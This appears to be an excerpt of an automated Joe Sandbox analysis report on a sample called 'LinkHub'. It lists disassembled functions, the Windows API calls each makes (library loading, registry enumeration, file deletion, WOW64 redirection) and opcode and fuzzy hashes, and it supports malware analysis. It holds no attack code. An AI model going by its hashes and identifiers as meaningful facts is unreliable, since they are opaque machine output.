                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 2081771294-1403004172
                                                                                        • Opcode ID: fbd46924481c28fe4ca1e0d92d5cd9d1a22a4f4e0cf84f858c9fe24c5c7f4fb3
                                                                                        • Instruction ID: e76f05355194fa6cf2772598c08127f3b02d7dbb1920d84032e716c280db1677
                                                                                        • Opcode Fuzzy Hash: fbd46924481c28fe4ca1e0d92d5cd9d1a22a4f4e0cf84f858c9fe24c5c7f4fb3
                                                                                        • Instruction Fuzzy Hash: C7210771920104BFDB15ABA0DC8ADFFBB78DF453A0F504229F411A71E1CB745D699A60
                                                                                        Function 002939B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00293A29
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00293A30
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00293A45
                                                                                        • DestroyWindow.USER32(?), ref: 00293A4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 3529120543-1011021900
                                                                                        • Opcode ID: 4f4cee596bd39d532e8bc16fc33b5c58604323eef1d4303ae8000ffbc7dbc57b
                                                                                        • Instruction ID: 7aa32648775eff0d510ecd1cdfb25da74ccc79f88e1dc89a9f4ca589becb8ebd
                                                                                        • Opcode Fuzzy Hash: 4f4cee596bd39d532e8bc16fc33b5c58604323eef1d4303ae8000ffbc7dbc57b
                                                                                        • Instruction Fuzzy Hash: 0A21DE72620206ABEF10CF64EC84FBB77E9EB45364F105219FA91960D0C371DD60AB60
                                                                                        Function 00299A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetCursorPos.USER32(?), ref: 00299A5D
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00299A72
                                                                                        • GetCursorPos.USER32(?), ref: 00299ABA
                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00299AF0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 2864067406-4239615555
                                                                                        • Opcode ID: 66659f8e76ca73c5e85e21eff03274d4ccc63ce5c171d719a86a32d446653c01
                                                                                        • Instruction ID: 94906a0efc5cc87b4d6cd42bd81b97bddeeec61cbb8c48c247867d162b6b29d1
                                                                                        • Opcode Fuzzy Hash: 66659f8e76ca73c5e85e21eff03274d4ccc63ce5c171d719a86a32d446653c01
                                                                                        • Instruction Fuzzy Hash: 3921BF31610018EFCF258F98D858EEA7BB9EF09320F50406AF9058B1A1D7369DA0EB60
                                                                                        Function 00201AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00201AF4
                                                                                        • GetClientRect.USER32(?,?), ref: 002431F9
                                                                                        • GetCursorPos.USER32(?), ref: 00243203
                                                                                        • ScreenToClient.USER32(?,?), ref: 0024320E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 4127811313-4239615555
                                                                                        • Opcode ID: 0f94b99e845bcbcb8be0744432cef6569db8a2ddb473954548e7e13de84dff5a
                                                                                        • Instruction ID: 8b016d9cbeca1401d4bd2475f98243ec13d70c295e57a249c5709dfacbfd415a
                                                                                        • Opcode Fuzzy Hash: 0f94b99e845bcbcb8be0744432cef6569db8a2ddb473954548e7e13de84dff5a
                                                                                        • Instruction Fuzzy Hash: F3115E32A2111AEBCF14DFA4D94A9EE77B8FB05344F100452F916E3181C7B1BAA1DBA1
                                                                                        Function 002250DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0022508E,00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002), ref: 002250FD
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00225110
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0022508E,00000003,?,0022502E,00000003,002C98D8,0000000C,00225185,00000003,00000002,00000000), ref: 00225133
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 5db2404720a74e06843ffc78b9fcf6297697036566e8741e867b9860f2fd82de
                                                                                        • Instruction ID: 5ecf192b15744272e6755f92a387146be63f891cc0c50c3bd2694b422794fabb
                                                                                        • Opcode Fuzzy Hash: 5db2404720a74e06843ffc78b9fcf6297697036566e8741e867b9860f2fd82de
                                                                                        • Instruction Fuzzy Hash: 17F06235A10228BBDB119F94FC4DBADBFB4EF04752F004069F809A21A0DF749E60DA94
                                                                                        Function 0025E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32 ref: 0025E785
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0025E797
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0025E7BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                        • API String ID: 145871493-2590602151
                                                                                        • Opcode ID: 0d8bce3d14645909e0ddc235b567be898f7eafa8ab248ff46d0e710c4bfe4cd5
                                                                                        • Instruction ID: 36beb32d9e2970f0f2e842c3f7af70f42017a1f219a326ef8a4203d506a5f8bb
                                                                                        • Opcode Fuzzy Hash: 0d8bce3d14645909e0ddc235b567be898f7eafa8ab248ff46d0e710c4bfe4cd5
                                                                                        • Instruction Fuzzy Hash: 0DF0E5B28316219FDF795F309C4CEA972686F20742B22059AFC05E3110DB70CEA88A58
                                                                                        Function 0020663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020664A
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0020665C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020666E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 145871493-3689287502
                                                                                        • Opcode ID: c8a207d9a78248a982a59a6fe59a54ba977f03377e4e545475ee5eb47b784406
                                                                                        • Instruction ID: fee68220d9a88f1d7a477c62cecb26049e6c21dadec3e46908d2b306b62765a3
                                                                                        • Opcode Fuzzy Hash: c8a207d9a78248a982a59a6fe59a54ba977f03377e4e545475ee5eb47b784406
                                                                                        • Instruction Fuzzy Hash: F8E0863661162317D3112B25BC0CB5A656C9F92B12B050216F808E2150DF64CC2190A4
                                                                                        Function 00206607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206610
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00206622
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206635
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 145871493-1355242751
                                                                                        • Opcode ID: 413eec86a44cef3249b9c402866df7c071d36531408d1c6f7d5c798922724ee6
                                                                                        • Instruction ID: 38c877418d01b86b1345add15f52da529d50f33c3a2fc81c7d2c318b5c0f2d32
                                                                                        • Opcode Fuzzy Hash: 413eec86a44cef3249b9c402866df7c071d36531408d1c6f7d5c798922724ee6
                                                                                        • Instruction Fuzzy Hash: 09D0123662263257C7222B25BC1CA8F6A189E92B513490116B818A2154CF65CD3195A8
                                                                                        Function 00273306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002735C4
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00273646
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0027365C
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0027366D
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0027367F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$Copy
                                                                                        • String ID:
                                                                                        • API String ID: 3226157194-0
                                                                                        • Opcode ID: 152b6c5b528f9d965c1f4316c0add094589d5a63bba66b1b9409e19c9325413e
                                                                                        • Instruction ID: 0b9683dd1124f15d26befb3bdfc807d3c7b805ab940330d63a8de8dd31f13b17
                                                                                        • Opcode Fuzzy Hash: 152b6c5b528f9d965c1f4316c0add094589d5a63bba66b1b9409e19c9325413e
                                                                                        • Instruction Fuzzy Hash: 57B16E72D10129BBDF15DFA4DC85EDEBBBCEF08300F4080A6F509A6142EA349B649F61
                                                                                        Function 0028ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0028AE87
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0028AE95
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0028AEC8
                                                                                        • CloseHandle.KERNEL32(?), ref: 0028B09D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 3488606520-0
                                                                                        • Opcode ID: 0535602d5491b98fcabbb86d90466e79864e1a365adf60af785c78df8bfaa913
                                                                                        • Instruction ID: 2aae2b2d15c6fe4662d2bc50ea884cc9d22e423d101892ec79bc3fe4d23772f4
                                                                                        • Opcode Fuzzy Hash: 0535602d5491b98fcabbb86d90466e79864e1a365adf60af785c78df8bfaa913
                                                                                        • Instruction Fuzzy Hash: CBA1C375A143019FE720EF24D886F2AB7E5AF44710F14885DF5998B2D2DB71EC508F82
                                                                                        Function 0028C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C505
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C560
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0028C5C3
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0028C606
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028C613
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 826366716-0
                                                                                        • Opcode ID: 3ff3e8de60cd9b1ec14344cd4e398992d99f8d5c7d1cc7083be8a1cfba5437bc
                                                                                        • Instruction ID: 1a4bbeaf00def3bc48ad5109a56d69a3014a40077b4f13c1dc103967eaf6302c
                                                                                        • Opcode Fuzzy Hash: 3ff3e8de60cd9b1ec14344cd4e398992d99f8d5c7d1cc7083be8a1cfba5437bc
                                                                                        • Instruction Fuzzy Hash: 5561BE35129242AFD714EF14C494E2ABBE4FF84308F64859CF0999B2D2CB31ED56CBA1
                                                                                        Function 0026ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026D7CD,?), ref: 0026E714
                                                                                          • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026D7CD,?), ref: 0026E72D
                                                                                          • Part of subcall function 0026EAB0: GetFileAttributesW.KERNEL32(?,0026D840), ref: 0026EAB1
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0026ED8A
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0026EDC3
                                                                                        • _wcslen.LIBCMT ref: 0026EF02
                                                                                        • _wcslen.LIBCMT ref: 0026EF1A
                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0026EF67
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3183298772-0
                                                                                        • Opcode ID: cd411766ffd9bef12fe1cefb92b7d5708d45707ed100a6aa357246e6aaa9e622
                                                                                        • Instruction ID: c4707694e676a7bf2ca050c43c21b65a0ea75b1ad5a46ec7098c76c8a73c3fb6
                                                                                        • Opcode Fuzzy Hash: cd411766ffd9bef12fe1cefb92b7d5708d45707ed100a6aa357246e6aaa9e622
                                                                                        • Instruction Fuzzy Hash: FE5162B24183859BCB24EB94D8819DFB3ECEF85310F40092EF685D3191EF75A6D88B56
                                                                                        Function 00269517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00269534
                                                                                        • VariantClear.OLEAUT32 ref: 002695A5
                                                                                        • VariantClear.OLEAUT32 ref: 00269604
                                                                                        • VariantClear.OLEAUT32(?), ref: 00269677
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002696A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        • Opcode ID: 6c4bb7ea59cba3e6d659bdf97c308e48874621d7d8c56bbae1dcbebc00ccfc2d
                                                                                        • Instruction ID: 45887e291d018b8c382ab70647f2e0fe9aaeb075c5b31cca8a6a29b9a5e28e19
                                                                                        • Opcode Fuzzy Hash: 6c4bb7ea59cba3e6d659bdf97c308e48874621d7d8c56bbae1dcbebc00ccfc2d
                                                                                        • Instruction Fuzzy Hash: CE514AB5A10219EFCB14CF58D884EAAB7F8FF89314B158559E909DB310E770E961CF90
                                                                                        Function 00279540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002795F3
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0027961F
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00279677
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0027969C
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002796A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                        • String ID:
                                                                                        • API String ID: 2832842796-0
                                                                                        • Opcode ID: f0ee95fbf96b8d4cf42f487ce44e44a2ccc53df0a41a5c421fbae7b4614527c1
                                                                                        • Instruction ID: b88b6718bac12cfa997fd4e8530789ccf367404aec318e8150a6e36ee12d91b5
                                                                                        • Opcode Fuzzy Hash: f0ee95fbf96b8d4cf42f487ce44e44a2ccc53df0a41a5c421fbae7b4614527c1
                                                                                        • Instruction Fuzzy Hash: 37512935A10615AFCB05DF65C885A6ABBF5FF48314F088058E949AB3A2CB35ED61CF90
                                                                                        Function 00289941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0028999D
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00289A2D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00289A49
